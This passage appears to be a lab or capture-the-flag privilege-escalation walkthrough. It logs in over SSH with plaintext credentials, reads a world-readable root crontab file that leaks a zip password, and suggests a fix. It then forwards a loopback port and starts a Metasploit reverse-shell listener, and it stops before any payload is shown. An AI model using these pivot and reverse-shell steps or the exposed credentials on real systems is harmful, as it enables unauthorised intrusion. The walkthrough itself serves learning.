Priv Esc
Credentials used for the SSH login below (user:password): enzo:RioTecRANDEntANT!
enzo@planning:~$ ls -l /opt
total 8
drwx--x--x 4 root root 4096 Feb 28 19:06 containerd
drwxr-xr-x 2 root root 4096 Jun 5 09:52 crontabs
enzo@planning:~$ ls -la /opt/containerd/
ls: cannot open directory '/opt/containerd/': Permission denied
enzo@planning:~$ ls -la /opt/crontabs/
total 12
drwxr-xr-x 2 root root 4096 Jun 5 09:52 .
drwxr-xr-x 4 root root 4096 Feb 28 19:21 ..
-rw-r--r-- 1 root root 737 Jun 7 04:00 crontab.db
enzo@planning:~$ cat /opt/crontabs/crontab.db
{"name":"Grafana backup","command":"/usr/bin/docker save root_grafana -o /var/backups/grafana.tar && /usr/bin/gzip /var/backups/grafana.tar && zip -P P4ssw0rdS0pRi0T3c /var/backups/grafana.tar.gz.zip /var/backups/grafana.tar.gz && rm /var/backups/grafana.tar.gz","schedule":"@daily","stopped":false,"timestamp":"Fri Feb 28 2025 20:36:23 GMT+0000 (Coordinated Universal Time)","logging":"false","mailing":{},"created":1740774983276,"saved":false,"_id":"GTI22PpoJNtRKg0W"}
{"name":"Cleanup","command":"/root/scripts/cleanup.sh","schedule":"* * * * *","stopped":false,"timestamp":"Sat Mar 01 2025 17:15:09 GMT+0000 (Coordinated Universal Time)","logging":"false","mailing":{},"created":1740849309992,"saved":false,"_id":"gNIRXh1WIc9K7BYX"}
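Finding: `/opt/crontabs/crontab.db` is world-readable (`-rw-r--r--`, owned by root) and stores the job definitions as JSON, including a zip password passed in plaintext with `-P`. One job references `/root/scripts/cleanup.sh`, so the jobs presumably run as root. Restricting the file to root and keeping secrets out of job command lines would close this exposure.

Restart the SSH session with the escape command line enabled (`-o EnableEscapeCommandline=yes`), so that a forward can be added from the `ssh>` prompt: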
❯ ssh enzo@10.10.11.68 -o EnableEscapeCommandline=yes
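Port forward: at the `ssh>` prompt, map local port 9999 to `127.0.0.1:8000` as seen from the target (a port reachable only on the target's loopback interface):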
enzo@planning:~$
ssh> -L 9999:127.0.0.1:8000
Forwarding port.
❯ msfconsole -q -x 'use exploit/multi/handler;set LHOST tun0; set LPORT 443; run'
[*] Using configured payload generic/shell_reverse_tcp
LHOST => tun0
LPORT => 443
[*] Started reverse TCP handler on 10.10.14.3:443